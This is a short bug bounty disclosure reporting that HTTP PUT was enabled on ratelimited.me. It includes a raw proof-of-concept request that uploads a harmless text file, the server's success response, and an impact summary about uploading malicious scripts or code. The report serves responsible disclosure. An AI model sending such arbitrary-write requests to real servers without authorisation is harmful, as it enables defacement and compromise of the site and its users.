HTTP PUT method is enabled ratelimited.me
Discovered by codeslayer137 on Ratelimited

This issue took No information to triage and 0 Days and 4 hours to resolve once triaged.



Found on HTTP PUT sites enabled on web servers. I tried testing to write the file / codelayer137.txt uploaded to the server using the PUT verb, and the contents of the file were then taken using the GET verb. the following is POC

Request: PUT /codeslayer137.txt HTTP/1.1 Host: ratelimited.me User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Connection: close Cookie: __cfduid=dfa5166b2ed63c2a5078df85a46ec5e941548497323; fs_uid=rs.fullstory.comHCE075768820354449408:5743114304094208; cookieconsent_status=dismiss; mp_9e50b60442d3361880f79100f15e5aac_mixpanel=%7B%22distinct_id%22%3A%20%2216889a21237498-0766105008d6a5-12666d4a-e1000-16889a212387c%22%2C%22%24device_id%22%3A%20%2216889a21237498-0766105008d6a5-12666d4a-e1000-16889a212387c%22%2C%22%24initial_referrer%22%3A%20%22%24direct%22%2C%22%24initial_referring_domain%22%3A%20%22%24direct%22%7D Upgrade-Insecure-Requests: 1 If-Modified-Since: Sun, 27 Jan 2019 00:07:53 GMT Content-Length: 21

Testing CodeSlayer137

Response: HTTP/1.1 200 OK Date: Tue, 29 Jan 2019 08:24:15 GMT Content-Type: text/plain Content-Length: 0 Connection: close Accept-Ranges: bytes Content-Security-Policy: block-all-mixed-content Etag: "be3b22647a7d52f2f662109652e629fc" Vary: Origin X-Amz-Request-Id: 157E4426C0B3D211 X-Minio-Deployment-Id: ebc7a0d8-9f47-4bdb-92ee-4a9cbbd3ec48 X-Xss-Protection: 1; mode=block Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Server: cloudflare CF-RAY: 4a0a4d20791f31a4-SIN

Impact

The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL. If enabled, an attacker may be able to place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.